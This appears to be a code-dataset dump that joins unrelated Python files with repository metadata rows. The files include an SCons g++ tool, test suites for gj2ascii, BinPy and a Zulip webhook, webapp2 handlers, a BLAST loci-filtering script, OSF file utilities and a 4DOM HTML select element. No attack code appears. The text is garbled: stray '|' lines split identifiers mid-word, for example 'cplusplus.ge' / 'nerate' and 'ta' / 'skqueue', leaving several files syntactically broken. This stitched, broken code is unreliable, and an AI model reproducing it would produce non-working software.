# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/g++.py 3842 2008/12/20 22:59:52 scons"
import os.path
import re
import subprocess
import SCons.Tool
import SCons.Util
cplusplus = __import__('c++', globals(), locals(), [])
compilers = ['g++']
def generate(env):
"""Add Builders and construction variables for g++ to an Environment."""
static_obj, shared_obj = SCons.Tool.createObjBuilders(env)
cplusplus.ge
|
nerate(env)
env['CXX'] = env.Detect(compilers)
# platform specific settings
if env['PLATFORM'] == 'aix':
env['SHCXXFLAGS'] = SCons.Util
|
.CLVar('$CXXFLAGS -mminimal-toc')
env['STATIC_AND_SHARED_OBJECTS_ARE_THE_SAME'] = 1
env['SHOBJSUFFIX'] = '$OBJSUFFIX'
elif env['PLATFORM'] == 'hpux':
env['SHOBJSUFFIX'] = '.pic.o'
elif env['PLATFORM'] == 'sunos':
env['SHOBJSUFFIX'] = '.pic.o'
# determine compiler version
if env['CXX']:
#pipe = SCons.Action._subproc(env, [env['CXX'], '-dumpversion'],
pipe = SCons.Action._subproc(env, [env['CXX'], '--version'],
stdin = 'devnull',
stderr = 'devnull',
stdout = subprocess.PIPE)
if pipe.wait() != 0: return
# -dumpversion was added in GCC 3.0. As long as we're supporting
# GCC versions older than that, we should use --version and a
# regular expression.
#line = pipe.stdout.read().strip()
#if line:
# env['CXXVERSION'] = line
line = pipe.stdout.readline()
match = re.search(r'[0-9]+(\.[0-9]+)+', line)
if match:
env['CXXVERSION'] = match.group(0)
def exists(env):
return env.Detect(compilers)
|
geowurster/gj2ascii
|
tests/test_cli.py
|
Python
|
bsd-3-clause
| 13,853
| 0.000361
|
"""
Unittests for gj2ascii CLI
"""
from __future__ import division
import os
import tempfile
import unittest
import click
import emoji
import fiona as fio
import pytest
import gj2ascii
from gj2ascii import cli
def test_complex(runner, expected_line_40_wide, line_file, compare_ascii):
result = runner.invoke(cli.main, [
line_file,
'--width', '40',
'--char', '+',
'--fill', '.',
'--no-prompt',
'--all-touched',
'--iterate',
'--crs', 'EPSG:26918'
])
assert result.exit_code == 0
assert compare_ascii(result.output, expected_line_40_wide)
def test_bad_fill_value(runner, poly_file):
result = runner.invoke(cli.main, ['-c toolong', poly_file])
assert result.exit_code != 0
assert result.output.startswith('Usage:')
assert 'Error:' in result.output
assert 'must be a single character' in result.output
def test_bad_rasterize_value(runner, poly_file):
result = runner.invoke(cli.main, ['-f toolong', poly_file])
assert result.exit_code != 0
assert result.output.startswith('Usage:')
assert 'Error:' in result.output
assert 'must be a single character' in result.output
def test_render_one_layer_too_many_args(runner, poly_file):
result = runner.invoke(cli.main, [
poly_file,
'--char', '-',
'--char', '8'
])
assert result.exit_code != 0
assert result.output.startswith('Error:')
assert 'number' in result.output
assert '--char' in result.output
def test_different_width(runner, poly_file):
fill = '+'
value = '.'
width = 62
result = runner.invoke(cli.main, [
'--width', width,
poly_file,
'--fill', fill,
'--char', value,
'--no-prompt'
])
assert result.exit_code == 0
for line in result.output.rstrip(os.linesep).splitlines():
if line.startswith((fill, value)):
assert len(line.rstrip(os.linesep).split()) == width / 2
def test_iterate_wrong_arg_count(runner, poly_file):
result = runner.invoke(cli.main, [
poly_file,
'--iterate',
'--char', '1',
'--char', '2'
])
assert result.exit_code != 0
assert result.output.startswith('Error:')
assert 'arg' in result.output
assert 'layer' in result.output
def test_bbox(runner, poly_file, small_aoi_poly_line_file, compare_ascii):
expected = os.linesep.join([
' + + + +',
' + + +',
' + +',
' +',
'+ +',
'+ + +',
'+ + +',
'+ +',
'+ + +',
' + +',
' + + +',
' + + + +',
' + + + + +',
' + + + + + +',
' + + + + + + +',
''
])
with fio.open(small_aoi_poly_line_file) as src:
cmd = [
poly_file,
'--width', '40',
'--char', '+',
'--bbox',
] + list(map(str, src.bounds))
result = runner.invoke(cli.main, cmd)
assert result.exit_code == 0
assert compare_ascii(result.output.strip(), expected.strip())
def test_exceed_auto_generate_colormap_limit(runner, poly_file):
infiles = [poly_file for i in range(len(gj2ascii.ANSI_COLORMAP.keys()) + 2)]
result = runner.invoke(cli.main, infiles)
assert result.exit_code != 0
assert result.output.startswith('Error:')
assert 'auto' in result.output
assert 'generate' in result.output
assert '--char' in result.output
def test_default_char_map(runner, poly_file, compare_ascii):
with fio.open(poly_file) as src:
expected = gj2ascii.render(src)
result = runner.invoke(cli.main, [
poly_file
])
assert result.exit_code == 0
assert compare_ascii(result.output.strip(), expected.strip())
def test_same_char_twice(runner, poly_file, line_file, compare_ascii):
width = 40
fill = '.'
char = '+'
with fio.open(poly_file) as poly, fio.open(line_file) as line:
coords = list(poly.bounds) + list(line.bounds)
bbox = (min(coords[0::4]), min(coords[1::4]), max(coords[2::4]), max(coords[3::4]))
expected = gj2ascii.render_multiple(
[(poly, char), (line, char)], width=width, fill=fill, bbox=bbox)
result = runner.invoke(cli.main, [
poly_file, line_file,
'--width', width,
'--char', char,
'--char', char,
'--fill', fill
])
assert result.exit_code == 0
assert compare_ascii(expected, result.output)
def test_iterate_bad_property(runner, single_feature_wv_file):
result = runner.invoke(cli.main, [
single_feature_wv_file,
'--iterate',
'--properties', 'bad-prop'
])
assert result.exit_code != 0
assert isinstance(result.exception, KeyError)
def test_styled_write_to_file(runner, single_feature_wv_file, compare_ascii):
with fio.open(single_feature_wv_file) as src:
expected = gj2ascii.render(src, width=20, char='1', fill='0')
with tempfile.NamedTemporaryFile('r+') as f:
result = runner.invoke(cli.main, [
single_feature_wv_file,
'--width', '20',
'--properties', 'NAME,ALAND',
'--char', '1=red',
'--fill', '0=blue',
'--outfile', f.name
])
f.seek(0)
assert result.exit_code == 0
assert result.output == ''
assert compare_ascii(f.read().strip(), expected.strip())
def test_stack_too_many_args(runner, multilayer_file):
result = runner.invoke(cli.main, [
mul
|
tilayer_file + ',polygons,lines',
'--char', '+',
'--char', '8',
'--char', '0' # 2 layers but 3 values
])
assert result.exit_code != 0
assert result.output.startswith('
|
Error:')
assert '--char' in result.output
assert 'number' in result.output
assert 'equal' in result.output
def test_iterate_too_many_layers(runner, multilayer_file):
result = runner.invoke(cli.main, [
multilayer_file,
'--iterate', '--no-prompt'
])
assert result.exit_code != 0
assert result.output.startswith('Error:')
assert 'single layer' in result.output
def test_multilayer_compute_colormap(runner, multilayer_file, compare_ascii):
coords = []
for layer in ('polygons', 'lines'):
with fio.open(multilayer_file, layer=layer) as src:
coords += list(src.bounds)
bbox = min(coords[0::4]), min(coords[1::4]), max(coords[2::4]), max(coords[3::4])
rendered_layers = []
for layer, char in zip(('polygons', 'lines'), ('0', '1')):
with fio.open(multilayer_file, layer=layer) as src:
rendered_layers.append(
gj2ascii.render(src, width=20, fill=' ', char=char, bbox=bbox))
expected = gj2ascii.stack(rendered_layers)
# Explicitly define since layers are not consistently listed in order
result = runner.invoke(cli.main, [
multilayer_file + ',polygons,lines',
'--width', '20'
])
assert result.exit_code == 0
assert compare_ascii(expected.strip(), result.output.strip())
def test_stack_layers(runner, multilayer_file, compare_ascii):
expected = os.linesep.join([
'. + . . . . . . . . . . . + . . . . . .',
'. + + + . . . . . . . . . . . . . . . .',
'. . 8 8 8 8 8 8 8 . . . . 8 . . . . . .',
'. . . 8 . . . . . . . . . 8 . . . . . .',
'. . . . 8 . . . . + . . . . 8 . . . . .',
'. . . . . 8 . . . + + . . . 8 . . . . .',
'. . . . . . 8 . . + + + + . 8 . . . . .',
'. . . . . 8 . . . . + + + + . 8 . . . .',
'. . . . 8 . . . . . . 8 8 8 . 8 . . + .',
'+ + + . 8 . . . 8 8 8 . + + . . 8 + + +',
'+ + + 8 . . . . . . . . . . . . 8 + + +',
'. . 8 . . . 8 . . + . . . . . . 8 + + .',
'. . . 8 . . 8 8 + + . . . . . . . 8 + .',
'. . . . 8 . 8 + 8 + . . . . . . . 8 + .',
|
daj0ker/BinPy
|
BinPy/tests/tree_tests.py
|
Python
|
bsd-3-clause
| 2,286
| 0.000875
|
from __future__ import print_function
from BinPy.connectors.connector import *
from BinPy.gates.tree import *
from BinPy.connectors.connector import *
from BinPy.gates.gates import *
from BinPy.combinational.combinational import *
from nose.tools import with_setup, nottest
'''
Testing backtrack() function for depths from 0 to 4.
'''
def get_tree_for_depth_checking(depth):
# Gates for depth test
g1 = AND(True, False)
g2 = AND(True, False)
g3 = AND(g1, g2)
g4 = AND(True, False)
g5 = AND(True, False)
g6 = AND(g4, g5)
g_final = AND(g3, g6)
# Instance of Tree
tree_inst = Tree(g_final, depth)
tree_inst.backtrack()
# Testing tree
n1 = (g1, [True, False])
n2 = (g2, [True, False])
n4 = (g4, [True, False])
n5 = (g5, [True, False])
n3 = (g3, [n1, n2])
n6 = (g6, [n4, n5])
tree_testing = (g_final, [n3, n6])
return tree_inst, tree_testing
def compare_trees(tree_inst, tree_testing, depth):
if isinstance(tree_testing, tuple):
if not tree_testing[0] == tree_inst.element:
assert False
if depth == 0:
if len(tree_inst.sons) != 0:
assert False
else:
for i in range(len(tree_testing[1])):
compare_trees(tree_inst.sons[i], tree_testing[1][i], depth - 1)
else:
if not tree_testing == tree_inst.element:
|
assert False
def backtrack_depth_test():
for i in range(6):
tree_inst
|
, tree_testing = get_tree_for_depth_checking(i)
compare_trees(tree_inst, tree_testing, i)
'''
Test to see if the set_depth method works
'''
def set_depth_test():
tree_inst, tree_testing = get_tree_for_depth_checking(0)
for i in range(1, 6):
tree_inst.set_depth(i)
tree_inst.backtrack()
compare_trees(tree_inst, tree_testing, i)
'''
Test not following Cycles functionality
'''
def not_following_cycles_test():
c1 = Connector(True)
g1 = AND(c1, True)
g2 = AND(g1, False)
g2.set_output(c1)
t_no_cycle = Tree(g2, 5, False)
t_cycle = Tree(g2, 5, True)
t_no_cycle.backtrack()
t_cycle.backtrack()
assert t_no_cycle.sons[0].sons[0].sons[0].sons == []
assert t_cycle.sons[0].sons[0].sons[0].sons[0].element == g1
|
rht/zulip
|
zerver/webhooks/helloworld/tests.py
|
Python
|
apache-2.0
| 3,346
| 0.002092
|
from django.conf import settings
from zerver.lib.test_classes import WebhookTestCase
from zerver.models import get_realm, get_system_bot
class HelloWorldHookTests(WebhookTestCase):
STREAM_NAME = "test"
URL_TEMPLATE
|
= "/api/v1/external/helloworld?&api_key={api_key}&stream={stream}"
PM_URL_TEMPLATE = "/api/v1/external/helloworld?&api_key={api_key}"
WEBHOOK_DIR_NAME = "helloworld"
# Note: Include a test function per
|
each distinct message condition your integration supports
def test_hello_message(self) -> None:
expected_topic = "Hello World"
expected_message = "Hello! I am happy to be here! :smile:\nThe Wikipedia featured article for today is **[Marilyn Monroe](https://en.wikipedia.org/wiki/Marilyn_Monroe)**"
# use fixture named helloworld_hello
self.check_webhook(
"hello",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
def test_goodbye_message(self) -> None:
expected_topic = "Hello World"
expected_message = "Hello! I am happy to be here! :smile:\nThe Wikipedia featured article for today is **[Goodbye](https://en.wikipedia.org/wiki/Goodbye)**"
# use fixture named helloworld_goodbye
self.check_webhook(
"goodbye",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
def test_pm_to_bot_owner(self) -> None:
# Note that this is really just a test for check_send_webhook_message
self.URL_TEMPLATE = self.PM_URL_TEMPLATE
self.url = self.build_webhook_url()
expected_message = "Hello! I am happy to be here! :smile:\nThe Wikipedia featured article for today is **[Goodbye](https://en.wikipedia.org/wiki/Goodbye)**"
self.send_and_test_private_message(
"goodbye",
expected_message=expected_message,
content_type="application/x-www-form-urlencoded",
)
def test_stream_error_pm_to_bot_owner(self) -> None:
# Note that this is really just a test for check_send_webhook_message
self.STREAM_NAME = "nonexistent"
self.url = self.build_webhook_url()
realm = get_realm("zulip")
notification_bot = get_system_bot(settings.NOTIFICATION_BOT, realm.id)
expected_message = "Your bot `webhook-bot@zulip.com` tried to send a message to stream #**nonexistent**, but that stream does not exist. Click [here](#streams/new) to create it."
self.send_and_test_private_message(
"goodbye",
expected_message=expected_message,
content_type="application/x-www-form-urlencoded",
sender=notification_bot,
)
def test_custom_topic(self) -> None:
# Note that this is really just a test for check_send_webhook_message
expected_topic = "Custom Topic"
self.url = self.build_webhook_url(topic=expected_topic)
expected_message = "Hello! I am happy to be here! :smile:\nThe Wikipedia featured article for today is **[Goodbye](https://en.wikipedia.org/wiki/Goodbye)**"
self.check_webhook(
"goodbye",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
|
krismcfarlin/todo_angular_endpoints_sockets
|
bp_content/themes/default/handlers/handlers.py
|
Python
|
lgpl-3.0
| 10,823
| 0.00462
|
# -*- coding: utf-8 -*-
"""
A real simple app for using webapp2 with auth and session.
It just covers the basics. Creating a user, login, logout
and a decorator for protecting certain handlers.
Routes are setup in routes.py and added in main.py
"""
# standard library imports
import logging
# related third party imports
import webapp2
from google.appengine.ext import ndb
from google.appengine.api import ta
|
skqueue
from webapp2_extras.auth import InvalidAuthIdError, InvalidPasswordError
f
|
rom webapp2_extras.i18n import gettext as _
from bp_includes.external import httpagentparser
# local application/library specific imports
import bp_includes.lib.i18n as i18n
from bp_includes.lib.basehandler import BaseHandler
from bp_includes.lib.decorators import user_required
from bp_includes.lib import captcha, utils
import bp_includes.models as models_boilerplate
import forms as forms
from google.appengine.api import memcache
from google.appengine.api import channel
import random
import logging
logger = logging.getLogger(__name__)
class ContactHandler(BaseHandler):
"""
Handler for Contact Form
"""
def get(self):
""" Returns a simple HTML for contact form """
if self.user:
user_info = self.user_model.get_by_id(long(self.user_id))
if user_info.name or user_info.last_name:
self.form.name.data = user_info.name + " " + user_info.last_name
if user_info.email:
self.form.email.data = user_info.email
params = {
"exception": self.request.get('exception')
}
return self.render_template('contact.html', **params)
def post(self):
""" validate contact form """
if not self.form.validate():
return self.get()
remote_ip = self.request.remote_addr
city = i18n.get_city_code(self.request)
region = i18n.get_region_code(self.request)
country = i18n.get_country_code(self.request)
coordinates = i18n.get_city_lat_long(self.request)
user_agent = self.request.user_agent
exception = self.request.POST.get('exception')
name = self.form.name.data.strip()
email = self.form.email.data.lower()
message = self.form.message.data.strip()
template_val = {}
try:
# parsing user_agent and getting which os key to use
# windows uses 'os' while other os use 'flavor'
ua = httpagentparser.detect(user_agent)
_os = ua.has_key('flavor') and 'flavor' or 'os'
operating_system = str(ua[_os]['name']) if "name" in ua[_os] else "-"
if 'version' in ua[_os]:
operating_system += ' ' + str(ua[_os]['version'])
if 'dist' in ua:
operating_system += ' ' + str(ua['dist'])
browser = str(ua['browser']['name']) if 'browser' in ua else "-"
browser_version = str(ua['browser']['version']) if 'browser' in ua else "-"
template_val = {
"name": name,
"email": email,
"ip": remote_ip,
"city": city,
"region": region,
"country": country,
"coordinates": coordinates,
"browser": browser,
"browser_version": browser_version,
"operating_system": operating_system,
"message": message
}
except Exception as e:
logging.error("error getting user agent info: %s" % e)
try:
subject = _("Contact") + " " + self.app.config.get('app_name')
# exceptions for error pages that redirect to contact
if exception != "":
subject = "{} (Exception error: {})".format(subject, exception)
body_path = "emails/contact.txt"
body = self.jinja2.render_template(body_path, **template_val)
email_url = self.uri_for('taskqueue-send-email')
taskqueue.add(url=email_url, params={
'to': self.app.config.get('contact_recipient'),
'subject': subject,
'body': body,
'sender': self.app.config.get('contact_sender'),
})
message = _('Your message was sent successfully.')
self.add_message(message, 'success')
return self.redirect_to('contact')
except (AttributeError, KeyError), e:
logging.error('Error sending contact form: %s' % e)
message = _('Error sending the message. Please try again later.')
self.add_message(message, 'error')
return self.redirect_to('contact')
@webapp2.cached_property
def form(self):
return forms.ContactForm(self)
class SecureRequestHandler(BaseHandler):
"""
Only accessible to users that are logged in
"""
@user_required
def get(self, **kwargs):
user_session = self.user
user_session_object = self.auth.store.get_session(self.request)
user_info = self.user_model.get_by_id(long(self.user_id))
user_info_object = self.auth.store.user_model.get_by_auth_token(
user_session['user_id'], user_session['token'])
try:
params = {
"user_session": user_session,
"user_session_object": user_session_object,
"user_info": user_info,
"user_info_object": user_info_object,
"userinfo_logout-url": self.auth_config['logout_url'],
}
return self.render_template('secure_zone.html', **params)
except (AttributeError, KeyError), e:
return "Secure zone error:" + " %s." % e
class DeleteAccountHandler(BaseHandler):
@user_required
def get(self, **kwargs):
chtml = captcha.displayhtml(
public_key=self.app.config.get('captcha_public_key'),
use_ssl=(self.request.scheme == 'https'),
error=None)
if self.app.config.get('captcha_public_key') == "PUT_YOUR_RECAPCHA_PUBLIC_KEY_HERE" or \
self.app.config.get('captcha_private_key') == "PUT_YOUR_RECAPCHA_PUBLIC_KEY_HERE":
chtml = '<div class="alert alert-error"><strong>Error</strong>: You have to ' \
'<a href="http://www.google.com/recaptcha/whyrecaptcha" target="_blank">sign up ' \
'for API keys</a> in order to use reCAPTCHA.</div>' \
'<input type="hidden" name="recaptcha_challenge_field" value="manual_challenge" />' \
'<input type="hidden" name="recaptcha_response_field" value="manual_challenge" />'
params = {
'captchahtml': chtml,
}
return self.render_template('delete_account.html', **params)
def post(self, **kwargs):
challenge = self.request.POST.get('recaptcha_challenge_field')
response = self.request.POST.get('recaptcha_response_field')
remote_ip = self.request.remote_addr
cResponse = captcha.submit(
challenge,
response,
self.app.config.get('captcha_private_key'),
remote_ip)
if cResponse.is_valid:
# captcha was valid... carry on..nothing to see here
pass
else:
_message = _('Wrong image verification code. Please try again.')
self.add_message(_message, 'error')
return self.redirect_to('delete-account')
if not self.form.validate() and False:
return self.get()
password = self.form.password.data.strip()
try:
user_info = self.user_model.get_by_id(long(self.user_id))
auth_id = "own:%s" % user_info.username
password = utils.hashing(password, self.app.config.get('salt'))
try:
# authenticate user by its password
user = self.user_model.get_by_auth_password(auth_id, password)
if user:
# Delete Social Login
for social in models_boilerplate.SocialUser.get_by_user(user_info.key)
|
reamdc1/gene_block_evolution_old
|
loci_filtering.py
|
Python
|
gpl-3.0
| 8,117
| 0.014291
|
#!/usr/bin/python
from multiprocessing import Pool
import time
import os
import sys
import argparse
from homolog4 import *
from collections import defaultdict
# Copyright(C) 2014 David Ream
# Released under Biopython license. http://www.biopython.org/DIST/LICENSE
# Do not remove this comment
# This exists to make the main function easier to read. It contains code to run the argument parser, and does nothing else.
def parser_code():
parser = argparse.ArgumentParser(description="Filter out redundant hits, by loci, from the initial BLAST parse and remove organisms that lack neighborhoods.")
parser.add_argument("-i", "--infolder", dest="infolder", default='./blast_parse_raw_operon/', metavar="FOLDER",
help="A folder that contains the initial parse of the BLAST hits. This program assumes that no loci filtering or organism removal has been done yet.")
parser.add_argument("-o", "--outfolder", dest="outfolder", metavar="FOLDER", default='./blast_parse/',
help="Folder where the BLAST results will be stored. Default is the folder './blast_result/'.")
parser.add_argument("-q", "--operon_query", dest="operon_query", default='./regulonDB/operon_names_and_genes.txt', metavar="FILE",
help="A file that contains the names and genes comprising the operons that are under investigation.")
parser.add_argument("-r", "--reference", dest="reference", default='NC_000913', metavar="STRING",
help="An accession number of the reference organism.")
parser.add_argument("-f", "--filter", dest="filter", default='', metavar="FILE",
help="A file that contains the accession numbers of the organisms that are under investigation.")
parser.add_argument("-n", "--num_proc", dest="num_proc", metavar="INT", default = os.sysconf("SC_NPROCESSORS_CONF"), type=int,
help="Number of processors that you want this script to run on. The default is every CPU that the system has.")
parser.add_argument("-g", "--max_gap", dest="max_intergenic_gap", metavar="INT", default = 500, type=int,
help="Length of the largest allowable intergenic gap allowed in determining a gene neighborhood. Default is 500 nucleotides")
return parser.parse_args()
def check_options(parsed_args):
if os.path.isdir(parsed_args.infolder):
infolder = parsed_args.infolder
else:
print "The folder %s does not exist." % parsed_args.infolder
sys.exit()
# if the directory that the user specifies does not exist, then the program makes it for them.
if not os.path.isdir(parsed_args.outfolder):
os.makedirs(parsed_args.outfolder)
outfolder = parsed_args.outfolder
if outfolder[-1] != '/':
outfolder = outfolder + '/'
if os.path.exists(parsed_args.operon_query):
operon_query = parsed_args.operon_query
else:
print "The file %s does not exist." % parsed_args.operon_query
sys.exit()
if os.path.exists(parsed_args.filter):
filter_file = parsed_args.filter
elif parsed_args.filter == '':
filter_file = parsed_args.filter
else:
print "The file %s does not exist." % parsed_args.filter
sys.exit()
if os.path.exists(parsed_args.operon_query):
filter_file = parsed_args.operon_query
else:
print "The file %s does not exist." % parsed_args.operon_query
sys.exit()
# section of code that deals determining the number of CPU cores that will be used by the program
if parsed_args.num_proc > os.sysconf("SC_NPROCESSORS_CONF"):
num_proc = os.sysconf("SC_NPROCESSORS_CONF")
elif parsed_args.num_proc < 1:
num_proc = 1
else:
num_proc = int(parsed_args.num_proc)
if parsed_args.num_proc < 1:
max_intergenic_gap = 1
else:
max_intergenic_gap = int(parsed_args.max_intergenic_gap)
return infolder, outfolder, operon_query, filter_file, num_proc, operon_query, max_intergenic_gap
#this function will return all of the files that are in a directory. os.walk is recursive traversal.
def returnRecursiveDirFiles(root_dir):
result = []
for path, dir_name, flist in os.walk(root_dir):
for f in flist:
fname = os.path.join(path, f)
if os.path.isfile(fname):
result.append(fname)
return result
# this function will return a dictionary of operon keyed off the operon name with data values in the form
# of a list of homologs which are homologous. ex. [abcA, abcB]
def return_self_homolog_dict(operon_list = 'operon_name_and_genes.txt', prot_file = 'operon_protein_query.fa', rna_file = 'operon_rna_query.fa'):
# makes a dictionary keyed by operon name and a list of the gene contained by the operon
operon_dict = {}
for line in [i.strip() for i in open(operon_list).readlines()]:
tmp = line.split('\t')
operon_dict.update({tmp[0]:tmp[1:]})
# set up databases for the different types of genes
# for proteins -p must be set to true
cmd = "formatdb -i %s -p T -o F" % (prot_file)
os.system(cmd)
# for RNA genes -p must be set to false
#cmd = "formatdb -i %s -p F -o F" % (rna_file)
#os.system(cmd)
# blast each set of genes against itself
'''cmd = "blastall -p blastp -a %i -i %s -d %s -e %s -o %s -m 9" % (os.sysconf("SC_NPROCESSORS_ONLN"), prot_file, prot_file, '1e-10', 'self_prot.txt')
os.system( cmd )'''
cmd = "blastall -p blastp -a %i -i %s -d %s -e %s -o %s -m 8" % (os.sysconf("SC_NPROCESSORS_ONLN"), prot_file, prot_file, '1e-10', 'self_prot.txt')
os.system( cmd )
#cmd = "blastall -p blastn -a %i -i %s -d %s -e %s -o %s -m 9" % (os.sysconf("SC_NPROCESSORS_ONLN"), rna_file, rna_file, '1e-10', 'self_rna.txt')
#os.system( cmd )
# in this next section i will read in the resulting blast results, and construct a dictionary which will be keyed off gene name and provide a list
# of homologs from the operon set. This list will allow the program to filter out spurious results. We will miss fusions of homologous genes, but
# hopefully this will be a rare event in our dataset, untill this can be revised
lst = [i.strip() for i in open('self_prot.txt').readlines() if i[0] != '#']
#for line in [i.strip() for i in open('self_rna.txt').readlines() if i[0] != '#']:
# lst.append(line)
result = {}
print "got here 1"
for line in lst:
source, hit = line.split('\t')[0:2]
source_annotation = source.split('|')[2]
hit_annotation = hit.split('|')[2]
# we have two genes in the test set that are homologous
|
if source_annotation != hit_annotation:
if source_annotation not in result.keys():
result.update({source_annotation: [hit_annotation]})
else:
result[source_annotation].append(hit_annotation)
print "got here 2"
return result
# The purpose of this function is to filter out the spurious hits on a locus, and determine the annotati
|
on of the gene at
# that position. To do this the program will make a dict of each [locus/start] ? and then determine the annotations that
# exist for it. If there are two annotations that have homologous genes then the best hit will be used. if there are two
# annotations for a locus which are not homologous then some sort of hit analysis will be performed to determine is there
# is a good candidate for a gene fusion. (should look at papers on this). When done the function will report a list of
# homologs that are ordered by start position whichi have been filtered for the best hit, or as a fusion.
def filter_locus_hits(h_list, self_homolog_dict):
pass
def main():
start = time.time()
print time.time() - start
# ./blast_parse.py -f phylo_order.txt
if __name__ == '__main__':
main()
|
arpitar/osf.io
|
website/files/utils.py
|
Python
|
apache-2.0
| 3,388
| 0.000885
|
from modularodm.exceptions import ValidationValueError
def copy_files(src, target_node, parent=None, name=None):
"""Copy the files from src to the target node
:param Folder src: The source to copy children from
:param Node target_node: The node settings of the project to copy files to
:param Folder parent: The parent of to attach the clone of src to, if applicable
"""
assert not parent or not parent.is_file, 'Parent must be a folder'
cloned = src.clone().wrapped()
cloned.parent = parent
cloned.node = target_node
cloned.name = name or cloned.name
if src.is_file:
cloned.versions = src.versions
cloned.save()
if not src.is_file:
for child in src.children:
copy_files(child, target_node, parent=cloned)
return cloned
class GenWrapper(object):
"""A Wrapper for MongoQuerySets
Overrides __iter__ so for loops will always
return wrapped objects.
All other methods are proxied to the underlying QuerySet
"""
def __ini
|
t__(self, mqs):
self.mqs = mqs
def __iter__(self):
"""Return
|
s a generator that wraps all StoredFileNodes
returned from self.mqs
"""
return (x.wrapped() for x in self.mqs)
def __repr__(self):
return '<website.files.utils.GenWrapper({!r})>'.format(self.mqs)
def __getitem__(self, x):
"""__getitem__ does not default to __getattr__
so it must be explicitly overriden
"""
return self.mqs[x].wrapped()
def __len__(self):
"""__len__ does not default to __getattr__
so it must be explicitly overriden
"""
return len(self.mqs)
def __getattr__(self, name):
if 'mqs' in self.__dict__:
try:
return getattr(self.mqs, name)
except AttributeError:
pass # Avoids error message about the underlying object
return object.__getattribute__(self, name)
def validate_location(value):
if value is None:
return # Allow for None locations but not broken dicts
from website.addons.osfstorage import settings
for key in ('service', settings.WATERBUTLER_RESOURCE, 'object'):
if key not in value:
raise ValidationValueError('Location {} missing key "{}"'.format(value, key))
def insort(col, element, get=lambda x: x):
"""Python's bisect does not allow for a get/key
so it can not be used on a list of dictionaries.
Inserts element into the sorted collection col via
a binary search.
if element is not directly compairable the kwarg get may
be a callable that transforms element into a compairable object.
ie: A lambda that returns a certain key of a dict or attribute of an object
:param list col: The collection to insort into
:param ? element: The Element to be insortted into col
:param callable get: A callable that take a type of element and returns a compairable
"""
if not col:
# If collection is empty go ahead and insert at the first position
col.insert(0, element)
return col
lo, hi = 0, len(col)
# Binary search for the correct position
while lo < hi:
mid = int((hi + lo) / 2)
if get(col[mid]) > get(element):
hi = mid
else:
lo = mid + 1
col.insert(lo, element)
return col
|
alanjw/GreenOpenERP-Win-X86
|
python/Lib/site-packages/_xmlplus/dom/html/HTMLSelectElement.py
|
Python
|
agpl-3.0
| 4,750
| 0.008421
|
########################################################################
#
# File Name: HTMLSelectElement.py
#
#
"""
WWW: http://4suite.com/4DOM e-mail: support@4suite.com
Copyright (c) 2000 Fourthought Inc, USA. All Rights Reserved.
See http://4suite.com/COPYRIGHT for license and copyright information
"""
from xml.dom import implementation
from xml.dom import IndexSizeErr
from xml.dom.html.HTMLElement import HTMLElement
import string
class HTMLSelectElement(HTMLElement):
def __init__(self, ownerDocument, nodeName='SELECT'):
HTMLElement.__init__(self, ownerDocument, nodeName)
def _get_type(self):
if self._get_multiple():
return 'select-multiple'
return 'select-one'
def _get_selectedIndex(self):
options = self._get_options()
|
for ctr in range(len(options)):
node = options.item(ctr)
if node._get_selected() == 1:
return ctr
return -1
def _set_selectedIndex(self,index):
options = self._get_options()
if index < 0 or index >=
|
len(options):
raise IndexSizeErr()
for ctr in range(len(options)):
node = options.item(ctr)
if ctr == index:
node._set_selected(1)
else:
node._set_selected(0)
def _get_value(self):
options = self._get_options()
node = options.item(self._get_selectedIndex())
if node.hasAttribute('VALUE'):
value = node.getAttribute('VALUE')
elif node.firstChild:
value = node.firstChild.data
else:
value = ''
return value
def _set_value(self,value):
# This doesn't seem to do anything in browsers
pass
def _get_length(self):
return self._get_options()._get_length()
def _get_options(self):
children = self.getElementsByTagName('OPTION')
return implementation._4dom_createHTMLCollection(children)
def _get_disabled(self):
if self.getAttributeNode('DISABLED'):
return 1
return 0
def _set_disabled(self,disabled):
if disabled:
self.setAttribute('DISABLED', 'DISABLED')
else:
self.removeAttribute('DISABLED')
def _get_multiple(self):
if self.getAttributeNode('MULTIPLE'):
return 1
return 0
def _set_multiple(self,mult):
if mult:
self.setAttribute('MULTIPLE', 'MULTIPLE')
else:
self.removeAttribute('MULTIPLE')
def _get_name(self):
return self.getAttribute('NAME')
def _set_name(self,name):
self.setAttribute('NAME',name)
def _get_size(self):
rt = self.getAttribute('SIZE')
if rt != None:
return string.atoi(rt)
return -1
def _set_size(self,size):
self.setAttribute('SIZE',str(size))
def _get_tabIndex(self):
return string.atoi(self.getAttribute('TABINDEX'))
def _set_tabIndex(self,tabindex):
self.setAttribute('TABINDEX',str(tabindex))
def add(self,newElement,beforeElement):
self.insertBefore(newElement,beforeElement)
def remove(self,index):
if index < 0 or index >= self._get_length:
return
hc = self._get_options()
node = hc.item(index)
self.removeChild(node)
def _get_form(self):
parent = self.parentNode
while parent:
if parent.nodeName == "FORM":
return parent
parent = parent.parentNode
return None
### Attribute Access Mappings ###
_readComputedAttrs = HTMLElement._readComputedAttrs.copy()
_readComputedAttrs.update ({
'type' : _get_type,
'length' : _get_length,
'options' : _get_options,
'form' : _get_form,
'selectedIndex' : _get_selectedIndex,
'value' : _get_value,
'disabled' : _get_disabled,
'multiple' : _get_multiple,
'name' : _get_name,
'size' : _get_size,
'tabIndex' : _get_tabIndex,
})
_writeComputedAttrs = HTMLElement._writeComputedAttrs.copy()
_writeComputedAttrs.update ({
'selectedIndex' : _set_selectedIndex,
'value' : _set_value,
'disabled' : _set_disabled,
'multiple' : _set_multiple,
'name' : _set_name,
'size' : _set_size,
'tabIndex' : _set_tabIndex,
})
